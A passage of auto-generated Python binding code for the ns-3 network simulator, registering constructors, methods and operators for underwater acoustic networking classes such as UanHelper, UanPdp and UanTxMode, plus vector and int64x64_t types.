## uan-address.h (module 'uan'): ns3::UanAddress::UanAddress(ns3::UanAddress const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanAddress const &', 'arg0')])
## uan-address.h (module 'uan'): ns3::UanAddress::UanAddress() [constructor]
cls.add_constructor([])
## uan-address.h (module 'uan'): ns3::UanAddress::UanAddress(uint8_t addr) [constructor]
cls.add_constructor([param('uint8_t', 'addr')])
## uan-address.h (module 'uan'): static ns3::UanAddress ns3::UanAddress::Allocate() [member function]
cls.add_method('Allocate',
'ns3::UanAddress',
[],
is_static=True)
## uan-address.h (module 'uan'): static ns3::UanAddress ns3::UanAddress::ConvertFrom(ns3::Address const & address) [member function]
cls.add_method('ConvertFrom',
'ns3::UanAddress',
[param('ns3::Address const &', 'address')],
is_static=True)
## uan-address.h (module 'uan'): void ns3::UanAddress::CopyFrom(uint8_t const * pBuffer) [member function]
cls.add_method('CopyFrom',
'void',
[param('uint8_t const *', 'pBuffer')])
## uan-address.h (module 'uan'): void ns3::UanAddress::CopyTo(uint8_t * pBuffer) [member function]
cls.add_method('CopyTo',
'void',
[param('uint8_t *', 'pBuffer')])
## uan-address.h (module 'uan'): uint8_t ns3::UanAddress::GetAsInt() const [member function]
cls.add_method('GetAsInt',
'uint8_t',
[],
is_const=True)
## uan-address.h (module 'uan'): static ns3::UanAddress ns3::UanAddress::GetBroadcast() [member function]
cls.add_method('GetBroadcast',
'ns3::UanAddress',
[],
is_static=True)
## uan-address.h (module 'uan'): static bool ns3::UanAddress::IsMatchingType(ns3::Address const & address) [member function]
cls.add_method('IsMatchingType',
'bool',
[param('ns3::Address const &', 'address')],
is_static=True)
return
def register_Ns3UanHelper_methods(root_module, cls):
## uan-helper.h (module 'uan'): ns3::UanHelper::UanHelper(ns3::UanHelper const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanHelper const &', 'arg0')])
## uan-helper.h (module 'uan'): ns3::UanHelper::UanHelper() [constructor]
cls.add_constructor([])
## uan-helper.h (module 'uan'): int64_t ns3::UanHelper::AssignStreams(ns3::NetDeviceContainer c, int64_t stream) [member function]
cls.add_method('AssignStreams',
'int64_t',
[param('ns3::NetDeviceContainer', 'c'), param('int64_t', 'stream')])
## uan-helper.h (module 'uan'): static void ns3::UanHelper::EnableAscii(std::ostream & os, uint32_t nodeid, uint32_t deviceid) [member function]
cls.add_method('EnableAscii',
'void',
[param('std::ostream &', 'os'), param('uint32_t', 'nodeid'), param('uint32_t', 'deviceid')],
is_static=True)
## uan-helper.h (module 'uan'): static void ns3::UanHelper::EnableAscii(std::ostream & os, ns3::NetDeviceContainer d) [member function]
cls.add_method('EnableAscii',
'void',
[param('std::ostream &', 'os'), param('ns3::NetDeviceContainer', 'd')],
is_static=True)
## uan-helper.h (module 'uan'): static void ns3::UanHelper::EnableAscii(std::ostream & os, ns3::NodeContainer n) [member function]
cls.add_method('EnableAscii',
'void',
[param('std::ostream &', 'os'), param('ns3::NodeContainer', 'n')],
is_static=True)
## uan-helper.h (module 'uan'): static void ns3::UanHelper::EnableAsciiAll(std::ostream & os) [member function]
cls.add_method('EnableAsciiAll',
'void',
[param('std::ostream &', 'os')],
is_static=True)
## uan-helper.h (module 'uan'): ns3::NetDeviceContainer ns3::UanHelper::Install(ns3::NodeContainer c) const [member function]
cls.add_method('Install',
'ns3::NetDeviceContainer',
[param('ns3::NodeContainer', 'c')],
is_const=True)
## uan-helper.h (module 'uan'): ns3::NetDeviceContainer ns3::UanHelper::Install(ns3::NodeContainer c, ns3::Ptr<ns3::UanChannel> channel) const [member function]
cls.add_method('Install',
'ns3::NetDeviceContainer',
[param('ns3::NodeContainer', 'c'), param('ns3::Ptr< ns3::UanChannel >', 'channel')],
is_const=True)
## uan-helper.h (module 'uan'): ns3::Ptr<ns3::UanNetDevice> ns3::UanHelper::Install(ns3::Ptr<ns3::Node> node, ns3::Ptr<ns3::UanChannel> channel) const [member function]
cls.add_method('Install',
'ns3::Ptr< ns3::UanNetDevice >',
[param('ns3::Ptr< ns3::Node >', 'node'), param('ns3::Ptr< ns3::UanChannel >', 'channel')],
is_const=True)
## uan-helper.h (module 'uan'): void ns3::UanHelper::SetMac(std::string type, std::string n0="", ns3::AttributeValue const & v0=ns3::EmptyAttributeValue(), std::string n1="", ns3::AttributeValue const & v1=ns3::EmptyAttributeValue(), std::string n2="", ns3::AttributeValue const & v2=ns3::EmptyAttributeValue(), std::string n3="", ns3::AttributeValue const & v3=ns3::EmptyAttributeValue(), std::string n4="", ns3::AttributeValue const & v4=ns3::EmptyAttributeValue(), std::string n5="", ns3::AttributeValue const & v5=ns3::EmptyAttributeValue(), std::string n6="", ns3::AttributeValue const & v6=ns3::EmptyAttributeValue(), std::string n7="", ns3::AttributeValue const & v7=ns3::EmptyAttributeValue()) [member function]
cls.add_method('SetMac',
'void',
[param('std::string', 'type'), param('std::string', 'n0', default_value='""'), param('ns3::AttributeValue const &', 'v0', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n1', default_value='""'), param('ns3::AttributeValue const &', 'v1', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n2', default_value='""'), param('ns3::AttributeValue const &', 'v2', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n3', default_value='""'), param('ns3::AttributeValue const &', 'v3', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n4', default_value='""'), param('ns3::AttributeValue const &', 'v4', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n5', default_value='""'), param('ns3::AttributeValue const &', 'v5', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n6', default_value='""'), param('ns3::AttributeValue const &', 'v6', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n7', default_value='""'), param('ns3::AttributeValue const &', 'v7', default_value='ns3::EmptyAttributeValue()')])
## uan-helper.h (module 'uan'): void ns3::UanHelper::SetPhy(std::string phyType, std::string n0="", ns3::AttributeValue const & v0=ns3::EmptyAttributeValue(), std::string n1="", ns3::AttributeValue const & v1=ns3::EmptyAttributeValue(), std::string n2="", ns3::AttributeValue const & v2=ns3::EmptyAttributeValue(), std::string n3="", ns3::AttributeValue const & v3=ns3::EmptyAttributeValue(), std::string n4="", ns3::AttributeValue const & v4=ns3::EmptyAttributeValue(), std::string n5="", ns3::AttributeValue const & v5=ns3::EmptyAttributeValue(), std::string n6="", ns3::AttributeValue const & v6=ns3::EmptyAttributeValue(), std::string n7="", ns3::AttributeValue const & v7=ns3::EmptyAttributeValue()) [member function]
cls.add_method('SetPhy',
'void',
[param('std::string', 'phyType'), param('std::string', 'n0', default_value='""'), param('ns3::AttributeValue const &', 'v0', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n1', default_value='""'), param('ns3::AttributeValue const &', 'v1', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n2', default_value='""'), param('ns3::AttributeValue const &', 'v2', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n3', default_value='""'), param('ns3::AttributeValue const &', 'v3', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n4', default_value='""'), param('ns3::AttributeValue const &', 'v4', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n5', default_value='""'), param('ns3::AttributeValue const &', 'v5', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n6', default_value='""'), param('ns3::AttributeValue const &', 'v6', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n7', default_value='""'), param('ns3::AttributeValue const &', 'v7', default_value='ns3::EmptyAttributeValue()')])
## uan-helper.h (module 'uan'): void ns3::UanHelper::SetTransducer(std::string type, std::string n0="", ns3::AttributeValue const & v0=ns3::EmptyAttributeValue(), std::string n1="", ns3::AttributeValue const & v1=ns3::EmptyAttributeValue(), std::string n2="", ns3::AttributeValue const & v2=ns3::EmptyAttributeValue(), std::string n3="", ns3::AttributeValue const & v3=ns3::EmptyAttributeValue(), std::string n4="", ns3::AttributeValue const & v4=ns3::EmptyAttributeValue(), std::string n5="", ns3::AttributeValue const & v5=ns3::EmptyAttributeValue(), std::string n6="", ns3::AttributeValue const & v6=ns3::EmptyAttributeValue(), std::string n7="", ns3::AttributeValue const & v7=ns3::EmptyAttributeValue()) [member function]
cls.add_method('SetTransducer',
'void',
[param('std::string', 'type'), param('std::string', 'n0', default_value='""'), param('ns3::AttributeValue const &', 'v0', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n1', default_value='""'), param('ns3::AttributeValue const &', 'v1', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n2', default_value='""'), param('ns3::AttributeValue const &', 'v2', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n3', default_value='""'), param('ns3::AttributeValue const &', 'v3', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n4', default_value='""'), param('ns3::AttributeValue const &', 'v4', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n5', default_value='""'), param('ns3::AttributeValue const &', 'v5', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n6', default_value='""'), param('ns3::AttributeValue const &', 'v6', default_value='ns3::EmptyAttributeValue()'), param('std::string', 'n7', default_value='""'), param('ns3::AttributeValue const &', 'v7', default_value='ns3::EmptyAttributeValue()')])
return
def register_Ns3UanModesList_methods(root_module, cls):
cls.add_output_stream_operator()
## uan-tx-mode.h (module 'uan'): ns3::UanModesList::UanModesList(ns3::UanModesList const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanModesList const &', 'arg0')])
## uan-tx-mode.h (module 'uan'): ns3::UanModesList::UanModesList() [constructor]
cls.add_constructor([])
## uan-tx-mode.h (module 'uan'): void ns3::UanModesList::AppendMode(ns3::UanTxMode mode) [member function]
cls.add_method('AppendMode',
'void',
[param('ns3::UanTxMode', 'mode')])
## uan-tx-mode.h (module 'uan'): void ns3::UanModesList::DeleteMode(uint32_t num) [member function]
cls.add_method('DeleteMode',
'void',
[param('uint32_t', 'num')])
## uan-tx-mode.h (module 'uan'): uint32_t ns3::UanModesList::GetNModes() const [member function]
cls.add_method('GetNModes',
'uint32_t',
[],
is_const=True)
return
def register_Ns3UanPacketArrival_methods(root_module, cls):
## uan-transducer.h (module 'uan'): ns3::UanPacketArrival::UanPacketArrival(ns3::UanPacketArrival const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPacketArrival const &', 'arg0')])
## uan-transducer.h (module 'uan'): ns3::UanPacketArrival::UanPacketArrival() [constructor]
cls.add_constructor([])
## uan-transducer.h (module 'uan'): ns3::UanPacketArrival::UanPacketArrival(ns3::Ptr<ns3::Packet> packet, double rxPowerDb, ns3::UanTxMode txMode, ns3::UanPdp pdp, ns3::Time arrTime) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::Packet >', 'packet'), param('double', 'rxPowerDb'), param('ns3::UanTxMode', 'txMode'), param('ns3::UanPdp', 'pdp'), param('ns3::Time', 'arrTime')])
## uan-transducer.h (module 'uan'): ns3::Time ns3::UanPacketArrival::GetArrivalTime() const [member function]
cls.add_method('GetArrivalTime',
'ns3::Time',
[],
is_const=True)
## uan-transducer.h (module 'uan'): ns3::Ptr<ns3::Packet> ns3::UanPacketArrival::GetPacket() const [member function]
cls.add_method('GetPacket',
'ns3::Ptr< ns3::Packet >',
[],
is_const=True)
## uan-transducer.h (module 'uan'): ns3::UanPdp ns3::UanPacketArrival::GetPdp() const [member function]
cls.add_method('GetPdp',
'ns3::UanPdp',
[],
is_const=True)
## uan-transducer.h (module 'uan'): double ns3::UanPacketArrival::GetRxPowerDb() const [member function]
cls.add_method('GetRxPowerDb',
'double',
[],
is_const=True)
## uan-transducer.h (module 'uan'): ns3::UanTxMode const & ns3::UanPacketArrival::GetTxMode() const [member function]
cls.add_method('GetTxMode',
'ns3::UanTxMode const &',
[],
is_const=True)
return
def register_Ns3UanPdp_methods(root_module, cls):
cls.add_output_stream_operator()
## uan-prop-model.h (module 'uan'): ns3::UanPdp::UanPdp(ns3::UanPdp const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPdp const &', 'arg0')])
## uan-prop-model.h (module 'uan'): ns3::UanPdp::UanPdp() [constructor]
cls.add_constructor([])
## uan-prop-model.h (module 'uan'): ns3::UanPdp::UanPdp(std::vector<ns3::Tap, std::allocator<ns3::Tap> > taps, ns3::Time resolution) [constructor]
cls.add_constructor([param('std::vector< ns3::Tap >', 'taps'), param('ns3::Time', 'resolution')])
## uan-prop-model.h (module 'uan'): ns3::UanPdp::UanPdp(std::vector<std::complex<double>,std::allocator<std::complex<double> > > arrivals, ns3::Time resolution) [constructor]
cls.add_constructor([param('std::vector< std::complex< double > >', 'arrivals'), param('ns3::Time', 'resolution')])
## uan-prop-model.h (module 'uan'): ns3::UanPdp::UanPdp(std::vector<double,std::allocator<double> > arrivals, ns3::Time resolution) [constructor]
cls.add_constructor([param('std::vector< double >', 'arrivals'), param('ns3::Time', 'resolution')])
## uan-prop-model.h (module 'uan'): static ns3::UanPdp ns3::UanPdp::CreateImpulsePdp() [member function]
cls.add_method('CreateImpulsePdp',
'ns3::UanPdp',
[],
is_static=True)
## uan-prop-model.h (module 'uan'): __gnu_cxx::__normal_iterator<const ns3::Tap*,std::vector<ns3::Tap, std::allocator<ns3::Tap> > > ns3::UanPdp::GetBegin() const [member function]
cls.add_method('GetBegin',
'__gnu_cxx::__normal_iterator< ns3::Tap const *, std::vector< ns3::Tap > >',
[],
is_const=True)
## uan-prop-model.h (module 'uan'): __gnu_cxx::__normal_iterator<const ns3::Tap*,std::vector<ns3::Tap, std::allocator<ns3::Tap> > > ns3::UanPdp::GetEnd() const [member function]
cls.add_method('GetEnd',
'__gnu_cxx::__normal_iterator< ns3::Tap const *, std::vector< ns3::Tap > >',
[],
is_const=True)
## uan-prop-model.h (module 'uan'): uint32_t ns3::UanPdp::GetNTaps() const [member function]
cls.add_method('GetNTaps',
'uint32_t',
[],
is_const=True)
## uan-prop-model.h (module 'uan'): ns3::Time ns3::UanPdp::GetResolution() const [member function]
cls.add_method('GetResolution',
'ns3::Time',
[],
is_const=True)
## uan-prop-model.h (module 'uan'): ns3::Tap const & ns3::UanPdp::GetTap(uint32_t i) const [member function]
cls.add_method('GetTap',
'ns3::Tap const &',
[param('uint32_t', 'i')],
is_const=True)
## uan-prop-model.h (module 'uan'): void ns3::UanPdp::SetNTaps(uint32_t nTaps) [member function]
cls.add_method('SetNTaps',
'void',
[param('uint32_t', 'nTaps')])
## uan-prop-model.h (module 'uan'): void ns3::UanPdp::SetResolution(ns3::Time resolution) [member function]
cls.add_method('SetResolution',
'void',
[param('ns3::Time', 'resolution')])
## uan-prop-model.h (module 'uan'): void ns3::UanPdp::SetTap(std::complex<double> arrival, uint32_t index) [member function]
cls.add_method('SetTap',
'void',
[param('std::complex< double >', 'arrival'), param('uint32_t', 'index')])
## uan-prop-model.h (module 'uan'): std::complex<double> ns3::UanPdp::SumTapsC(ns3::Time begin, ns3::Time end) const [member function]
cls.add_method('SumTapsC',
'std::complex< double >',
[param('ns3::Time', 'begin'), param('ns3::Time', 'end')],
is_const=True)
## uan-prop-model.h (module 'uan'): std::complex<double> ns3::UanPdp::SumTapsFromMaxC(ns3::Time delay, ns3::Time duration) const [member function]
cls.add_method('SumTapsFromMaxC',
'std::complex< double >',
[param('ns3::Time', 'delay'), param('ns3::Time', 'duration')],
is_const=True)
## uan-prop-model.h (module 'uan'): double ns3::UanPdp::SumTapsFromMaxNc(ns3::Time delay, ns3::Time duration) const [member function]
cls.add_method('SumTapsFromMaxNc',
'double',
[param('ns3::Time', 'delay'), param('ns3::Time', 'duration')],
is_const=True)
## uan-prop-model.h (module 'uan'): double ns3::UanPdp::SumTapsNc(ns3::Time begin, ns3::Time end) const [member function]
cls.add_method('SumTapsNc',
'double',
[param('ns3::Time', 'begin'), param('ns3::Time', 'end')],
is_const=True)
return
def register_Ns3UanPhyListener_methods(root_module, cls):
## uan-phy.h (module 'uan'): ns3::UanPhyListener::UanPhyListener() [constructor]
cls.add_constructor([])
## uan-phy.h (module 'uan'): ns3::UanPhyListener::UanPhyListener(ns3::UanPhyListener const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanPhyListener const &', 'arg0')])
## uan-phy.h (module 'uan'): void ns3::UanPhyListener::NotifyCcaEnd() [member function]
cls.add_method('NotifyCcaEnd',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhyListener::NotifyCcaStart() [member function]
cls.add_method('NotifyCcaStart',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhyListener::NotifyRxEndError() [member function]
cls.add_method('NotifyRxEndError',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhyListener::NotifyRxEndOk() [member function]
cls.add_method('NotifyRxEndOk',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhyListener::NotifyRxStart() [member function]
cls.add_method('NotifyRxStart',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## uan-phy.h (module 'uan'): void ns3::UanPhyListener::NotifyTxStart(ns3::Time duration) [member function]
cls.add_method('NotifyTxStart',
'void',
[param('ns3::Time', 'duration')],
is_pure_virtual=True, is_virtual=True)
return
def register_Ns3UanTxMode_methods(root_module, cls):
cls.add_output_stream_operator()
## uan-tx-mode.h (module 'uan'): ns3::UanTxMode::UanTxMode(ns3::UanTxMode const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanTxMode const &', 'arg0')])
## uan-tx-mode.h (module 'uan'): ns3::UanTxMode::UanTxMode() [constructor]
cls.add_constructor([])
## uan-tx-mode.h (module 'uan'): uint32_t ns3::UanTxMode::GetBandwidthHz() const [member function]
cls.add_method('GetBandwidthHz',
'uint32_t',
[],
is_const=True)
## uan-tx-mode.h (module 'uan'): uint32_t ns3::UanTxMode::GetCenterFreqHz() const [member function]
cls.add_method('GetCenterFreqHz',
'uint32_t',
[],
is_const=True)
## uan-tx-mode.h (module 'uan'): uint32_t ns3::UanTxMode::GetConstellationSize() const [member function]
cls.add_method('GetConstellationSize',
'uint32_t',
[],
is_const=True)
## uan-tx-mode.h (module 'uan'): uint32_t ns3::UanTxMode::GetDataRateBps() const [member function]
cls.add_method('GetDataRateBps',
'uint32_t',
[],
is_const=True)
## uan-tx-mode.h (module 'uan'): ns3::UanTxMode::ModulationType ns3::UanTxMode::GetModType() const [member function]
cls.add_method('GetModType',
'ns3::UanTxMode::ModulationType',
[],
is_const=True)
## uan-tx-mode.h (module 'uan'): std::string ns3::UanTxMode::GetName() const [member function]
cls.add_method('GetName',
'std::string',
[],
is_const=True)
## uan-tx-mode.h (module 'uan'): uint32_t ns3::UanTxMode::GetPhyRateSps() const [member function]
cls.add_method('GetPhyRateSps',
'uint32_t',
[],
is_const=True)
## uan-tx-mode.h (module 'uan'): uint32_t ns3::UanTxMode::GetUid() const [member function]
cls.add_method('GetUid',
'uint32_t',
[],
is_const=True)
return
def register_Ns3UanTxModeFactory_methods(root_module, cls):
## uan-tx-mode.h (module 'uan'): ns3::UanTxModeFactory::UanTxModeFactory(ns3::UanTxModeFactory const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanTxModeFactory const &', 'arg0')])
## uan-tx-mode.h (module 'uan'): ns3::UanTxModeFactory::UanTxModeFactory() [constructor]
cls.add_constructor([])
## uan-tx-mode.h (module 'uan'): static ns3::UanTxMode ns3::UanTxModeFactory::CreateMode(ns3::UanTxMode::ModulationType type, uint32_t dataRateBps, uint32_t phyRateSps, uint32_t cfHz, uint32_t bwHz, uint32_t constSize, std::string name) [member function]
cls.add_method('CreateMode',
'ns3::UanTxMode',
[param('ns3::UanTxMode::ModulationType', 'type'), param('uint32_t', 'dataRateBps'), param('uint32_t', 'phyRateSps'), param('uint32_t', 'cfHz'), param('uint32_t', 'bwHz'), param('uint32_t', 'constSize'), param('std::string', 'name')],
is_static=True)
## uan-tx-mode.h (module 'uan'): static ns3::UanTxMode ns3::UanTxModeFactory::GetMode(std::string name) [member function]
cls.add_method('GetMode',
'ns3::UanTxMode',
[param('std::string', 'name')],
is_static=True)
## uan-tx-mode.h (module 'uan'): static ns3::UanTxMode ns3::UanTxModeFactory::GetMode(uint32_t uid) [member function]
cls.add_method('GetMode',
'ns3::UanTxMode',
[param('uint32_t', 'uid')],
is_static=True)
return
def register_Ns3Vector2D_methods(root_module, cls):
cls.add_output_stream_operator()
## vector.h (module 'core'): ns3::Vector2D::Vector2D(ns3::Vector2D const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector2D const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector2D::Vector2D(double _x, double _y) [constructor]
cls.add_constructor([param('double', '_x'), param('double', '_y')])
## vector.h (module 'core'): ns3::Vector2D::Vector2D() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector2D::x [variable]
cls.add_instance_attribute('x', 'double', is_const=False)
## vector.h (module 'core'): ns3::Vector2D::y [variable]
cls.add_instance_attribute('y', 'double', is_const=False)
return
def register_Ns3Vector3D_methods(root_module, cls):
cls.add_output_stream_operator()
## vector.h (module 'core'): ns3::Vector3D::Vector3D(ns3::Vector3D const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector3D const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector3D::Vector3D(double _x, double _y, double _z) [constructor]
cls.add_constructor([param('double', '_x'), param('double', '_y'), param('double', '_z')])
## vector.h (module 'core'): ns3::Vector3D::Vector3D() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector3D::x [variable]
cls.add_instance_attribute('x', 'double', is_const=False)
## vector.h (module 'core'): ns3::Vector3D::y [variable]
cls.add_instance_attribute('y', 'double', is_const=False)
## vector.h (module 'core'): ns3::Vector3D::z [variable]
cls.add_instance_attribute('z', 'double', is_const=False)
return
def register_Ns3Empty_methods(root_module, cls):
## empty.h (module 'core'): ns3::empty::empty() [constructor]
cls.add_constructor([])
## empty.h (module 'core'): ns3::empty::empty(ns3::empty const & arg0) [copy constructor]
cls.add_constructor([param('ns3::empty const &', 'arg0')])
return
def register_Ns3Int64x64_t_methods(root_module, cls):
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('*', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('+', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_unary_numeric_operator('-')
cls.add_binary_numeric_operator('-', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short unsigned int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('unsigned char const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long long int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('long int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('short int const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('signed char const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('double const', 'right'))
cls.add_binary_numeric_operator('/', root_module['ns3::int64x64_t'], root_module['ns3::int64x64_t'], param('ns3::int64x64_t const &', 'right'))
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('>')
cls.add_binary_comparison_operator('!=')
cls.add_inplace_numeric_operator('*=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('+=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('-=', param('ns3::int64x64_t const &', 'right'))
cls.add_inplace_numeric_operator('/=', param('ns3::int64x64_t const &', 'right'))
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('<=')
cls.add_binary_comparison_operator('==')
cls.add_binary_comparison_operator('>=')
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t() [constructor]
cls.add_constructor([])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(double v) [constructor]
cls.add_constructor([param('double', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(int v) [constructor]
cls.add_constructor([param('int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long int v) [constructor]
cls.add_constructor([param('long int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long int v) [constructor]
cls.add_constructor([param('long long int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(unsigned int v) [constructor]
cls.add_constructor([param('unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long unsigned int v) [constructor]
cls.add_constructor([param('long unsigned int', 'v')])
## int64x64-double.h (module 'core'): ns3::int64x64_t::int64x64_t(long long unsigned int v) [constructor]
